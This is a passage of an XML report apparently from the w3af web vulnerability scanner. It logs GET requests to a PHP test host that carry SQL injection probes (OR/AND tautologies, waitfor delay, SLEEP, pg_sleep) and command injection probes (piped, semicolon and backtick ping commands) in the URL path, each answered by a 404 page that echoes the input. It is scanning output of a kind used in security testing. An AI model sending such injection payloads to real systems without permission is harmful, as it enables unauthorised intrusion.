                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="705">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%22+AND+%2253%22%3D%2254 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%22+AND+%2253%22%3D%2254 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%22+AND+%2253%22%3D%2254'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="720">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/86%22+OR+%2286%22%3D%2286 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 86%22+OR+%2286%22%3D%2286 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='86%22+OR+%2286%22%3D%2286'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="726">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/86%22+AND+%2286%22%3D%2287 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 86%22+AND+%2286%22%3D%2287 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='86%22+AND+%2286%22%3D%2287'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="730">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="731">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="732">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%27+OR+%2753%27%3D%2753 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%27+OR+%2753%27%3D%2753 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%27+OR+%2753%27%3D%2753'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="738">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%27+AND+%2753%27%3D%2754 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%27+AND+%2753%27%3D%2754 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%27+AND+%2753%27%3D%2754'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="749">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/52%27+OR+%2752%27%3D%2752 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 52%27+OR+%2752%27%3D%2752 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='52%27+OR+%2752%27%3D%2752'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="751">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="753">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="754">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/52%27+AND+%2752%27%3D%2753 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 52%27+AND+%2752%27%3D%2753 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='52%27+AND+%2752%27%3D%2753'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="759">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53+OR+53%3D53+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53+OR+53%3D53+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53+OR+53%3D53+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="764">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53+AND+53%3D54+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53+AND+53%3D54+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53+AND+53%3D54+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="771">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="772">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="773">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/87+OR+87%3D87+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87+OR+87%3D87+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87+OR+87%3D87+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="777">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/87+AND+87%3D88+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87+AND+87%3D88+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87+AND+87%3D88+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="787">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="788">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="803">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="804">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="819">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="820">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="835">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="836">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="851">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="852">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
